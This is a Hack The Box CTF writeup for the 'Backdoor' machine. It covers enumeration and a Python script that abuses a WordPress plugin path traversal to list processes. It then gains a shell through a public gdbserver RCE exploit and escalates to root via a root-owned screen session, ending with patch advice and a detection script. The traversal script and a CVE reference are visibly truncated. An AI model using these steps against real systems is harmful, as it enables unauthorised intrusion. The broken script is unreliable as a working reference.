d3vyce 095a13b2c9
add: writeup-ctf
2024-03-02 21:49:07 +01:00


---
title: "Writeup - Backdoor (HTB)"
date: 2022-04-19
slug: "writeup-backdoor-htb"
type: "writeup-ctf"
---
This is a writeup for the [Backdoor](https://app.hackthebox.com/machines/Backdoor) machine from the HackTheBox site.
# Enumeration
First, let's start with a scan of our target with the following command:
```bash
nmap -sV 10.10.11.125
```
Three TCP ports are discovered:
![](img/image-1.webp)
- 22/tcp : SSH port (OpenSSH 8.2p1)
- 80/tcp : web server (Apache 2.4.41)
- 1337/tcp : ?????
We have a website on port 80, and port 1337 hosts a service that is unknown for the moment; let's see what the site looks like.
![](img/image-2.webp)
# Exploit
After inspecting the page, I notice that it is a site based on the WordPress CMS; let's run a scan with "WPScan" to try to identify flaws:
![](img/image-3.webp)
Nothing special, so let's try an aggressive detection of the plugins. For this I use the following command:
```bash
wpscan --url http://backdoor.htb --plugin-detection aggressive
```
![](img/image-4.webp)
There are two plugins: akismet and ebook-download. After some research I find that ebook-download in version 1.1 is exploitable (CVE-.
So we write a script to automate the scan of the process list: if the page returned is larger than 82 bytes, the process exists.
```python
import requests

# Iterate over candidate PIDs. The traversal path appended to the
# ebookdownloadurl parameter is cut off after "/proc" in the source of
# this writeup, so it is left as-is here.
for i in range(0, 1000):
    url = "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc"
    answer = requests.get(url)
    lg = len(answer.text)
    # A non-existent process yields an 82-byte response; anything larger is a hit
    if lg > 82:
        if '1337' in answer.text:
            print("%d %s" % (lg, answer.text))
```
After running the script, we find 2 services:
![](img/image-5.webp)
These processes are gdbserver, running on our mystery port 1337. So we can now look for exploits related to this service.
I quickly find the following script, which allows remote code execution via the GDB service:
[GNU gdbserver 9.2 - Remote Command Execution (RCE)](https://www.exploit-db.com/exploits/50539)
After generating a payload with msfvenom, I run the script:
![](img/image-6.webp)
I now have a shell on the remote machine and can get the first flag.
![](img/image-7.webp)
# Privilege escalation
First I try to find the SUID files. For that I use the following command:
```bash
find / -perm -u=s -type f 2>/dev/null
```
![](img/image-8.webp)
There are a lot of usual commands. But among the list there is "screen", a command that allows managing several terminals at the same time. I then check whether a process is running with this command:
![](img/image-9.webp)
And indeed there is a process running. But not just any process: a root shell with the options -dmS:
- -d : detach the screen when started
- -m : ignore the $STY environment variable; creation of a new session is enforced
- -S : when creating a new session, this option can be used to specify a meaningful name
So we know that a screen session named root has been created by the user root. If we manage to connect to this screen, we will have access to a root shell.
To connect to the detached screen we need to use the following command:
```bash
screen -x [name]/[user]
```
But before connecting we have to set the $TERM variable; to do this I use the following command:
```bash
export TERM=screen
```
I can now connect to the root screen with the following command:
```bash
screen -x root/root
```
I now have access to a root shell and can retrieve the last flag.
![](img/image-10.webp)
# Recommendations
To patch this host I think the following actions would be necessary:
- Update the WordPress plugin
- Update gdbserver
- Do not run screen as root with the -m option
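As an added example (not part of the original writeup), here is a small audit that checks for the condition abused in the privilege escalation above and targeted by the last recommendation: a detached screen session (-d, -m and -S, in any order or combination of short flags) started by root. The process list is a constructed sample; on a live host it would come from `ps -eo user,pid,args`.

```bash
#!/usr/bin/env bash
# Constructed sample process list (user, pid, command ...) mimicking the
# situation found on the box: a detached, named screen session owned by root.
SAMPLE_PS='root 1 /sbin/init
root 854 /usr/bin/screen -dmS root
user 900 /usr/bin/screen -dmS mine
root 1210 /bin/sh /usr/bin/gdbserver 0.0.0.0:1337
root 1300 /usr/bin/screen -S root'

# Read ps-style lines on stdin and print the PIDs of screen processes that
# belong to root and were started with the -d, -m and -S short flags
# (combined as -dmS or given separately, in any order).
find_root_detached_screens() {
    awk '$1 == "root" && $3 ~ /(^|\/)screen$/ {
        d = m = S = 0
        for (i = 4; i <= NF; i++) {
            if ($i !~ /^-[A-Za-z]+$/) continue
            if (index($i, "d")) d = 1
            if (index($i, "m")) m = 1
            if (index($i, "S")) S = 1
        }
        if (d && m && S) print $2
    }'
}

# Number of findings in the constructed sample (expected: 1, PID 854).
count_sample_findings() {
    printf '%s\n' "$SAMPLE_PS" | find_root_detached_screens | wc -l | tr -d ' '
}

# Run against the sample when executed directly:
# printf '%s\n' "$SAMPLE_PS" | find_root_detached_screens
```

Any PID printed is a root session that a SUID screen binary would let another user attach to with `screen -x`, which is exactly the path used above.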